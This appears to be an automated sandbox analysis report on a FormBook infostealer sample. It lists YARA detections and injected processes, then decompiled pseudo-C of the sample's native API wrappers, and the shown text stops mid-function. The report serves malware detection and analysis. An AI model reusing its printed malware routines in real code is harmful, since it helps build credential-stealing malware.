Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 6388

General

Start time:	14:40:39
Start date:	22/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 5700 Parent PID: 2908

General

Start time:	14:41:05
Start date:	22/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cscript.exe PID: 6156 Parent PID: 5700

General

Start time:	14:41:42
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cscript.exe
Imagebase:	0x1190000
File size:	143360 bytes
MD5 hash:	00D3041E47F99E48DD5FFFEDF60F6304
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: stage4.exe PID: 6388 Parent PID: 764 stage4.exeCOMMON

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.9%
Total number of Nodes:	680
Total number of Limit Nodes:	72

Executed Functions

Function 012185CA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E012185CA(intOrPtr _a4, HANDLE* _a8, long _a12, char _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t32;

				asm("sbb al, 0xc3");
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E012191D0(_t32, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t12 =  &_a16; // 0x7a002e
				_t21 = NtCreateFile(_a8, _a12,  *_t12, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x012185ca
0x012185d3
0x012185df
0x012185e7
0x0121860d
0x0121861d
0x01218621

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,01213BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01213BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0121861D

Strings

=U, xrefs: 012185CC
.z`, xrefs: 0121860D, 01218618

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`$=U
API String ID: 823142352-2050847675
Opcode ID: bfed53677daf4ceab29e524a8f746c92c950c8973f9baba5c280f11b071fc58c
Instruction ID: 2ae2593fb55b3fd37c589c42e91018dc299d391ecdd843cee3d1a491684c304b
Opcode Fuzzy Hash: bfed53677daf4ceab29e524a8f746c92c950c8973f9baba5c280f11b071fc58c
Instruction Fuzzy Hash: 7B01B2B2214108AFCB48CF98DC95EEB77E9AF8C754F158648FA1D97240C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012185D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E012185D0(intOrPtr _a4, HANDLE* _a8, long _a12, char _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E012191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t12 =  &_a16; // 0x7a002e
				_t21 = NtCreateFile(_a8, _a12,  *_t12, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x012185df
0x012185e7
0x0121860d
0x0121861d
0x01218621

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,01213BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01213BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0121861D

Strings

.z`, xrefs: 0121860D, 01218618

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 9f6bf34b5b4e701007d0a1e31b0dba1dcda1f0827a47e4e39053290dfa292497
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 4FF0BDB2210208ABCB08CF88DC94EEB77EDAF8C754F158248BA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01209B30, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01209B30(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_v8 =  &_v536;
				_t15 = E0121AF70( &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0121B390(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0121B610(__ebx, __edi,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E01219710(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x01209b4c
0x01209b4f
0x01209b54
0x01209b59
0x01209b63
0x01209b68
0x01209b6b
0x01209b6d
0x01209b75
0x01209b7a
0x01209b7a
0x01209b81
0x01209b89
0x01209b8c
0x01209b8e
0x01209ba2
0x00000000
0x01209ba4
0x01209baa
0x01209b5e
0x01209b5e
0x01209b5e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 01209BA2

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction ID: b214372148f6f7354a56d24acff561b30ea97d50f3c64ad86fadd593c5b2237f
Opcode Fuzzy Hash: 95fb8e7be991e7a3834cfd23532fdb6265e305c358471754a12ee14398f87ec4
Instruction Fuzzy Hash: CE011EB5E1020EABDF10DBE4DC41FADB7B89F64208F0046A5AA0D97286F671E754CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0121867C, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 16%

			E0121867C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;
				void* _t31;

				asm("lds esp, [eax-0x74aacb7f]");
				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E012191D0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t29))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t28, _t31); // executed
				return _t18;
			}

0x0121867c
0x01218683
0x0121868f
0x01218697
0x012186c5
0x012186c9

APIs

NtReadFile.NTDLL(01213D62,5E972F65,FFFFFFFF,01213A21,?,?,01213D62,?,01213A21,FFFFFFFF,5E972F65,01213D62,?,00000000), ref: 012186C5

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d9db849bb7192f382631b99b11e1b2a823885a3584e184650a985a5bd4d33c2f
Instruction ID: f1f85d5989eec94fe37b6b95f008323b1ebd553db4e4ada0e2434b7f603df9e1
Opcode Fuzzy Hash: d9db849bb7192f382631b99b11e1b2a823885a3584e184650a985a5bd4d33c2f
Instruction Fuzzy Hash: 79F0F4B2200108AFCB18DF98CC94EEB77A9EF9C354F128248BE0D97240D631E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01218680, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E01218680(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E012191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}

0x01218683
0x0121868f
0x01218697
0x012186c5
0x012186c9

APIs

NtReadFile.NTDLL(01213D62,5E972F65,FFFFFFFF,01213A21,?,?,01213D62,?,01213A21,FFFFFFFF,5E972F65,01213D62,?,00000000), ref: 012186C5

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: d7145ec6f1884ef7d7aca4815654af4a8690f606dec22c8f5fc4670ec2612347
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: B1F0A4B2210208ABCB18DF89DC94EEB77EDAF8C754F158248BE1D97241D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012187AA, Relevance: 1.5, APIs: 1, Instructions: 31
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E012187AA(void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				void* _v117;
				long _t15;
				void* _t25;

				_t11 = _a4;
				E012191D0(_t25, _a4, _a4 + 0xc60,  *((intOrPtr*)(_t11 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}

0x012187b3
0x012187c7
0x012187e9
0x012187ed

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01202D11,00002000,00003000,00000004), ref: 012187E9

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f8304e1d828c7eac84fa91f8d9edb7544baadb5e61f010702a0ebac90c9d4935
Instruction ID: ae8e10b017e5c7773223f394a889701554f283b48e7faac9c3d351b36b20edb0
Opcode Fuzzy Hash: f8304e1d828c7eac84fa91f8d9edb7544baadb5e61f010702a0ebac90c9d4935
Instruction Fuzzy Hash: A9F0F8B1610219AFDB14DF99CC85EEB77A9AF9C754F118248BE09A7241C631E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012187B0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E012187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				E012191D0(_t21, _a4, _a4 + 0xc60,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x012187c7
0x012187e9
0x012187ed

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01202D11,00002000,00003000,00000004), ref: 012187E9

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 2cfa08b34e8e7647f1cf5e2e09d80e191b01dad93da334fcccd056455bfa667a
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: EDF015B2210208ABCB18DF89CC84EAB77ADAF88654F118148BE0897241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01218700, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01218700(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t3 = _a4 + 0xc50; // 0xc50
				E012191D0(_t11, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0121870f
0x01218717
0x01218725
0x01218729

APIs

NtClose.NTDLL(01213D40,?,?,01213D40,00000000,FFFFFFFF), ref: 01218725

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: e00755835cb3ed387c16c9b8ed3b020696b396c1a89af1217eb25b2f2197534d
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: A9D01776200218ABDB14EB98CC89EA77BACEF48660F154499BA189B242C570FA4086E0

Uniqueness

Uniqueness Score: -1.00%

Function 012088C0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75225f149f2b00da4a535f92b0de220c1a6ba1a3bd23eac47605f1a37702f3c1
Instruction ID: f75fb8fb3bfa0f8f5f68cb7bc8a2e336f02d8d805ccfd5a0f2c26ae38b0bb3b7
Opcode Fuzzy Hash: 75225f149f2b00da4a535f92b0de220c1a6ba1a3bd23eac47605f1a37702f3c1
Instruction Fuzzy Hash: DA214C72C6020E5BCB16E6649D41FFF73BDAF20200F44026DE94993182F634BB098BA2

Uniqueness

Uniqueness Score: -1.00%

Function 012188DB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E012188DB(void* __edi, intOrPtr _a4, void* _a8, long _a12, char _a16) {
				char _t10;
				void* _t17;

				_t17 = __edi;
				asm("aad 0x55");
				_t7 = _a4;
				_t3 = _t7 + 0xc74; // 0xc74
				E012191D0(_t17, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t4 =  &_a16; // 0x7a002e
				_t10 = RtlFreeHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}

0x012188db
0x012188df
0x012188e3
0x012188ef
0x012188f7
0x012188fc
0x0121890d
0x01218911

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01203B93), ref: 0121890D

Strings

.z`, xrefs: 012188FC, 01218908

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 9cee4594537263631a69ae58260c78ec79fc7d08a182b15e3ca4525a5ac3d367
Instruction ID: 8e6d0ed5d60a03d7bae26aeba9785592ea519627858bb09b33dce2f0ae3172f9
Opcode Fuzzy Hash: 9cee4594537263631a69ae58260c78ec79fc7d08a182b15e3ca4525a5ac3d367
Instruction Fuzzy Hash: DFE09AB22002146BDB18EF99CC48EA777ACAFA8250F014148FD1C5B251C670E900CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 012188E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E012188E0(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E012191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t4 =  &_a16; // 0x7a002e
				_t10 = RtlFreeHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}

0x012188ef
0x012188f7
0x012188fc
0x0121890d
0x01218911

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01203B93), ref: 0121890D

Strings

.z`, xrefs: 012188FC, 01218908

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 55fc402b60f89026c2523bec54067650dcc960bd209a506bdf54b3674b340599
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 06E046B1210208ABDB18EF99CC48EA777ACEF88750F018558FE085B241C631F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 01207280, Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E01207280(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				void* _t13;
				long _t14;
				long _t22;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0121A140( &_v67, 0, 0x3f);
				E0121AD20( &_v68, 3);
				_t12 = E01209B30(__ebx, __edi, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E01213E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				if(_t13 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 = PostThreadMessageW(_t22, 0x8003, _t27 + (E01209290(_t33, 1, 8) & 0x000000ff) - 0x40, _t14); // executed
					}
					return _t14;
				}
				return _t13;
			}

0x01207280
0x0120728f
0x01207293
0x0120729e
0x012072ae
0x012072be
0x012072ca
0x012072cc
0x012072cd
0x012072da
0x012072dc
0x012072de
0x012072fb
0x012072fb
0x00000000
0x012072fd
0x01207302

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 012072DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 012072FB

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 31b90551a1089718d78f88c1d81ca4716bc9dd17b572c33c310b861d8d0e99e0
Instruction ID: d88d7bdf6ccf8bbd7b6b6c05b9be5c79756796c1ebffab5c0cbc483d0c29ff4c
Opcode Fuzzy Hash: 31b90551a1089718d78f88c1d81ca4716bc9dd17b572c33c310b861d8d0e99e0
Instruction Fuzzy Hash: 1401F731A9022A7BEB21E6948C02FBE776C5F10B60F040114FF04BA1C2E694790542F5

Uniqueness

Uniqueness Score: -1.00%

Function 01207303, Relevance: 3.0, APIs: 2, Instructions: 29
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E01207303(void* __eax, void* __esi, intOrPtr _a4, int _a8, int _a12, int _a16) {
				int _v8;
				int _v132;
				int _v136;
				char _v656;
				int _v668;
				char _v684;
				char _v688;
				int __ebx;
				intOrPtr __edi;
				void* __ebp;
				long _t62;
				long _t66;
				void* _t71;

				if(__esi + 1 >= 0) {
					_t62 = PostThreadMessageW(_t66, 0x111, 0, 0); // executed
					_t79 = _t62;
					if(_t62 == 0) {
						_t62 = PostThreadMessageW(_t66, 0x8003, _t71 + (E01209290(_t79, 1, 8) & 0x000000ff) - 0x40, _t62); // executed
					}
					return _t62;
				} else {
					asm("outsb");
					__edx = 0x887a043a;
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v8 = 0;
					_v688 = 0;
					 &_v684 = E0121A140( &_v684, 0, 0x2a4);
					__esi = _a16;
